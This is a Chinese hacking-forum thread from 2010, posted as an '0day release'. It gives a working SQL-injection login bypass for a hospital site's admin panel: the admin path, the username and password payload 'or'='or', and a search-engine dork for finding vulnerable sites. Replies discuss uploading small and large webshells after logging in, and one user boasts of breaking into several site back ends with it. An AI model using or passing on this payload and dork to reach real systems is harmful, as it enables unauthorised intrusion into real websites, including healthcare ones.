【3.A.S.T】网络安全爱好者 » 0day发布 » 龙溪医院后台万能密码登陆漏洞

返回列表发帖

3.A.S.T少尉

Rank: 2

帖子: 34
积分: 74
威望: 81
金钱: 86
在线时间: 8 小时

1楼 跳转到 » 倒序看帖

字体大小: tT

发表于 2010-1-19 01:11 | 只看该作者

龙溪医院后台万能密码登陆漏洞

龙溪, 漏洞, 后台, 密码, 医院

不细讲，漏洞很简单。
后台目录:ADMIN
用户名和密码都是： 'or'='or'

G.CN 搜索：inurl:healthbbs.asp

有个问题就是，我研究一下午可以利用解析传进去小马，可以访问，大马有的站也可以进去，但不知道为什么访问不了，找不到路径。
希望老大能破解一下。把方法告诉一下大家。学习一下

Administrators

Rank: 15

帖子: 3852
积分: 13044
威望: 16780
金钱: 36761
在线时间: 1139 小时

管理组高手勋章核心成员原创奖章帅哥勋章突出贡献奖优质人品奖章论坛元老管理组成员技术组成员

2楼

发表于 2010-1-19 09:28 | 只看该作者

也许是你弄的站大马被杀了，和这个0day没有关系

希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系，他人勿扰
于智者同行，你会不同凡响；与高人为伍，你会登上巅峰

3.A.S.T中尉

Rank: 3 Rank: 3

帖子: 131
积分: 211
威望: 218
金钱: 162
在线时间: 18 小时

3楼

发表于 2010-1-19 15:58 | 只看该作者

不是每个后台都能拿下SHELL

3.A.S.T少尉

Rank: 2

帖子: 34
积分: 74
威望: 81
金钱: 86
在线时间: 8 小时

4楼

发表于 2010-1-19 21:54 | 只看该作者

学习了看来是没办法了

3.A.S.T中尉

Rank: 3 Rank: 3

帖子: 131
积分: 211
威望: 218
金钱: 162
在线时间: 18 小时

5楼

发表于 2010-1-20 14:33 | 只看该作者

小马能传大马就能传，你传不进可能是因为杀了

3.A.S.T少尉

Rank: 2

帖子: 30
积分: 90
威望: 130
金钱: 265
在线时间: 5 小时

6楼

发表于 2010-1-22 23:05 | 只看该作者

天啊。。。。这比我扫洞洞方便多了。。一口气。。进了几个网站后台。。。